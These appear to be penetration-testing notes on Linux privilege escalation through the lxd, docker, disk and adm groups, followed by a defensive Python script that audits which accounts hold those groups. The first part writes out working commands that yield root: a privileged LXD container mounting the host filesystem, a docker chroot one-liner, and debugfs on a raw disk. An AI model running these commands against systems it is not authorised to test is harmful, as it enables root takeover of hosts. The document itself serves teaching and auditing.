LXC / LXD
LXD is similar to Docker and is Ubuntu's container manager. Upon installation, all users are added to the LXD group. Membership in this group can be used to escalate privileges by creating an LXD container, making it privileged, and then accessing the host file system at /mnt/root.
devops@NIX02:~$ id
uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)
Unzip the Alpine image (a minimal Docker image based on Alpine Linux).
unzip alpine.zip
#output
Archive: alpine.zip
extracting: 64-bit Alpine/alpine.tar.gz
inflating: 64-bit Alpine/alpine.tar.gz.root
cd 64-bit\ Alpine
Import the local image.
lxc image import alpine-v3.18-x86_64-20230607_1234.tar.gz --alias alpine
lxc image list
Start a privileged container with security.privileged set to true. This runs the container without a UID mapping, making the root user in the container the same as the root user on the host.
lxc init alpine r00t -c security.privileged=true
Mount the host file system.
lxc config device add r00t host-root disk source=/ path=/mnt/root recursive=true
Spawn a shell inside the container instance.
lxc start r00t
lxc exec r00t /bin/bash
lxc exec r00t /bin/sh
# try the sh shell, because Alpine is lightweight
Docker
Discover groups.
id
uid=1001(user) gid=1001(user) groups=1001(user),999(docker)
This means you can run docker with the same privileges as the root user.
# exploit
docker run -v /:/mnt --rm -it ubuntu chroot /mnt
Disk
If a user is in the disk group, that user can write to any system disk, such as /dev/sda1.
id
groups=1001(user),6(disk)
# exploit
sudo debugfs /dev/sda1
ADM
If a user is in the adm group, that user can read the system logs in /var/log.
id
groups=1001(user),4(adm)
cat /var/log/auth.log
cat /var/log/cron.log
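
A defender's audit for the four groups covered above, as an added example that is not part of the original notes: it reports which accounts hold lxd, docker, disk or adm, including accounts that have one of them as their primary group and so do not appear in the member field of /etc/group. The function name audit and the sample file contents are constructed for illustration.

```python
# Groups discussed on this page and what membership gives away.
RISKY_GROUPS = {
    "lxd": "can start privileged containers and mount the host /",
    "docker": "can bind-mount the host / into a container as root",
    "disk": "raw access to block devices such as /dev/sda1",
    "adm": "can read logs under /var/log",
}

# Constructed sample data in /etc/group and /etc/passwd format.
SAMPLE_GROUP = """\
adm:x:4:syslog,user
disk:x:6:
lxd:x:110:devops
docker:x:999:
devops:x:1009:
"""
SAMPLE_PASSWD = """\
devops:x:1009:1009::/home/devops:/bin/bash
user:x:1001:1001::/home/user:/bin/bash
build:x:1002:999::/home/build:/bin/sh
"""


def audit(group_text, passwd_text, risky=RISKY_GROUPS):
    """Return {group: sorted member accounts} for each risky group with members."""
    findings, gid_to_group = {}, {}
    for line in group_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 4 or parts[0] not in risky:
            continue
        name, _, gid, members = parts
        gid_to_group[gid] = name
        findings[name] = {m for m in members.split(",") if m}
    # An account whose *primary* GID is a risky group is not listed in the
    # member field of /etc/group, so check field 4 of /etc/passwd as well.
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[3] in gid_to_group:
            findings[gid_to_group[parts[3]]].add(parts[0])
    return {g: sorted(m) for g, m in findings.items() if m}


if __name__ == "__main__":
    # On a real host, pass the contents of /etc/group and /etc/passwd instead.
    for group, members in audit(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{group}: {', '.join(members)} ({RISKY_GROUPS[group]})")
```

Any account this reports for lxd, docker or disk should be treated as root-equivalent when reviewing access.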